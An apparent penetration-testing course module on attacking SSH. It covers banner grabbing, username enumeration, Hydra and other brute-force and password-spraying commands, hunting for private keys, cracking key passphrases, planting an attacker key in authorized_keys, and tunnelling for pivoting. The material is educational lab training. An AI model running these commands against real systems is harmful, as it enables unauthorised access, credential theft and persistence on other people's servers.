SSH Enumeration & Attacks

intermediate30 minWriteup

Attacking SSH services and authentication

Learning Objectives

  • Enumerate SSH configurations
  • Perform SSH brute force attacks
  • Exploit SSH key misconfigurations
  • Understand SSH tunneling

SSH (Secure Shell) is like FTP's security-conscious younger sibling. It encrypts everything, requires authentication, and provides secure remote access. But "secure" doesn't mean "unbreakable" - weak passwords, key misconfigurations, and old versions still make SSH a juicy target.

Running on port 22 (usually), SSH is the standard way to remotely manage Linux/Unix servers. It can also tunnel other protocols, forward ports, and transfer files via SCP/SFTP. If you compromise SSH credentials, you often have direct shell access.

SSH vs Telnet

SSH replaced Telnet because Telnet sends everything in cleartext. If you see port 23 (Telnet) open, that's a finding on its own - and credentials can be sniffed.

SSH Enumeration

Banner Grabbing

bash
1606070;"># Get SSH version
2nc -nv 192.168.1.10 22
3ssh -v user@192.168.1.10
4 
5606070;"># Nmap service detection
6nmap -sV -p 22 192.168.1.10
7 
8606070;"># Detailed SSH info
9nmap -p 22 --script ssh2-enum-algos,ssh-hostkey 192.168.1.10

The SSH banner reveals version information. Different versions have different vulnerabilities:

  • OpenSSH < 7.7: Username enumeration (CVE-2018-15473)
  • OpenSSH 2.3-4.7: Various vulnerabilities
  • Dropbear: Embedded device SSH - often outdated

Username Enumeration

Some SSH versions respond differently to valid vs invalid usernames, allowing enumeration without actual login attempts.

bash
1606070;"># Check for user enumeration vulnerability
2nmap -p 22 --script ssh-auth-methods 192.168.1.10
3 
4606070;"># Use ssh-audit for comprehensive analysis
5ssh-audit 192.168.1.10
6 
7606070;"># Metasploit username enumeration
8use auxiliary/scanner/ssh/ssh_enumusers
9set RHOSTS 192.168.1.10
10set USER_FILE /usr/share/wordlists/usernames.txt
11run

Common Usernames

Always try: root, admin, user, test, guest, administrator, ubuntu, centos, ec2-user (AWS), azureuser (Azure), and any usernames found during OSINT.

SSH Brute Forcing

bash
1606070;"># Hydra brute force
2hydra -l root -P /usr/share/wordlists/rockyou.txt ssh:606070;">//192.168.1.10
3hydra -L users.txt -P passwords.txt ssh:606070;">//192.168.1.10
4 
5606070;"># Limit threads (SSH often limits connections)
6hydra -l root -P passwords.txt -t 4 ssh:606070;">//192.168.1.10
7 
8606070;"># Medusa
9medusa -h 192.168.1.10 -u root -P passwords.txt -M ssh
10 
11606070;"># Ncrack
12ncrack -p 22 --user root -P passwords.txt 192.168.1.10
13 
14606070;"># Patator
15patator ssh_login host=192.168.1.10 user=root password=FILE0 0=passwords.txt

Rate Limiting

Most SSH servers limit login attempts. Use fewer threads (-t 4 in Hydra) and consider using fail2ban bypass techniques if testing your own systems. Too aggressive = temporary IP ban.

Smart Brute Forcing

bash
1606070;"># Password spraying (one pass, many users)
2hydra -L users.txt -p 606070;">#a5d6ff;">"Summer2024!" ssh://192.168.1.10
3 
4606070;"># Common passwords to try first
5606070;"># Password1, Welcome1, Company123, Season+Year
6606070;"># username+123, username+!, username+@company
7 
8606070;"># Use custom wordlist based on OSINT
9606070;"># Company name variations, employee names, locations

SSH Key Attacks

Finding SSH Keys

Private keys are the holy grail. If you find one, you might not need a password at all.

bash
1606070;"># Common private key locations
2~/.ssh/id_rsa
3~/.ssh/id_ed25519
4~/.ssh/id_ecdsa
5/root/.ssh/id_rsa
6/etc/ssh/ssh_host_*_key
7/home/*/.ssh/id_rsa
8 
9606070;"># Search for private keys
10grep -r 606070;">#a5d6ff;">"BEGIN RSA PRIVATE KEY" /home/
11grep -r 606070;">#a5d6ff;">"BEGIN OPENSSH PRIVATE KEY" /home/
12find / -name 606070;">#a5d6ff;">"id_rsa" 2>/dev/null
13 
14606070;"># Look for keys in backups, web directories, git repos
15find /var/www -name 606070;">#a5d6ff;">"*.pem" -o -name "*.key" 2>/dev/null

Using Found Keys

bash
1606070;"># Set correct permissions
2chmod 600 id_rsa
3 
4606070;"># Connect with key
5ssh -i id_rsa user@192.168.1.10
6 
7606070;"># If key is encrypted, crack the passphrase
8ssh2john id_rsa > hash.txt
9john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
10 
11606070;"># Or with hashcat
12hashcat -m 22931 hash.txt wordlist.txt

Authorized_keys Abuse

bash
1606070;"># If you have write access to ~/.ssh/authorized_keys
2606070;"># Generate your own key
3ssh-keygen -t rsa -b 4096
4 
5606070;"># Add your public key
6echo 606070;">#a5d6ff;">"ssh-rsa AAAA...your-key... attacker@kali" >> /home/user/.ssh/authorized_keys
7 
8606070;"># Now you can SSH in
9ssh -i your_key user@192.168.1.10

Key File Permissions

SSH is picky about key file permissions. Private keys must be 600 (rw-------). If SSH complains about permissions, chmod 600 is your friend.

SSH Tunneling

SSH tunneling lets you route traffic through SSH connections. Perfect for accessing internal services or pivoting through compromised hosts.

Local Port Forwarding

Access remote services as if they were local. "Bring remote port to me."

bash
1606070;"># Forward remote port 3306 (MySQL) to local 3306
2ssh -L 3306:localhost:3306 user@192.168.1.10
3 
4606070;"># Forward internal host through jump box
5ssh -L 8080:internal-server:80 user@jump-box
6 
7606070;"># Now access MySQL locally
8mysql -h 127.0.0.1 -u root -p

Remote Port Forwarding

Make your local services accessible on the remote server. "Send my port there."

bash
1606070;"># Make your local port 4444 accessible on remote as 4444
2ssh -R 4444:localhost:4444 user@192.168.1.10
3 
4606070;"># Useful for reverse shells through firewalls

Dynamic Port Forwarding (SOCKS Proxy)

Create a SOCKS proxy to route any traffic through SSH.

bash
1606070;"># Create SOCKS proxy on local port 1080
2ssh -D 1080 user@192.168.1.10
3 
4606070;"># Use with proxychains
5proxychains nmap -sT 10.0.0.0/24
6 
7606070;"># Or configure browser to use SOCKS proxy
8606070;"># localhost:1080

SSH Vulnerabilities

bash
1606070;"># Comprehensive SSH audit
2ssh-audit 192.168.1.10
3 
4606070;"># Check supported algorithms
5nmap -p 22 --script ssh2-enum-algos 192.168.1.10
6 
7606070;"># Check for known CVEs
8searchsploit openssh
9searchsploit ssh

Notable SSH Vulnerabilities

  • CVE-2018-15473: Username enumeration in OpenSSH < 7.7
  • CVE-2016-0777/0778: Roaming vulnerability (memory leak)
  • CVE-2020-15778: Command injection via scp
  • Weak algorithms: SHA1, MD5, CBC ciphers are deprecated

ssh-audit is Essential

ssh-audit checks for weak algorithms, vulnerable versions, and configuration issues. It's the fastest way to assess SSH security.

SSH Enumeration Methodology

SSH Enumeration Process

1
Banner GrabGet version, identify potential vulnerabilities
2
User EnumTest for username enumeration vulnerability
3
Key SearchLook for exposed private keys
4
Default CredsTry common username/password combos
5
Brute ForceCareful password attacks with rate limiting
6
SSH AuditCheck for weak algorithms and CVEs
7
TunnelingUse SSH for pivoting once authenticated

Knowledge Check

Quick Quiz
Question 1 of 3

What port does SSH typically run on?

Challenges

SSH Key Hunt

Challenge
🌱 beginner

Find an exposed SSH private key and use it to gain access to the server.

Need a hint? (4 available)

SSH Tunnel to Database

Challenge
🔥 intermediate

Use SSH port forwarding to access an internal MySQL database that's not directly accessible.

Need a hint? (4 available)

Key Takeaways

  • SSH runs on port 22 and encrypts all traffic
  • Banner grabbing reveals version and potential vulnerabilities
  • Some SSH versions allow username enumeration
  • Finding private keys = instant access (check permissions!)
  • SSH tunneling enables pivoting and accessing internal services
  • Use ssh-audit for comprehensive security assessment
  • Brute force carefully - rate limiting is common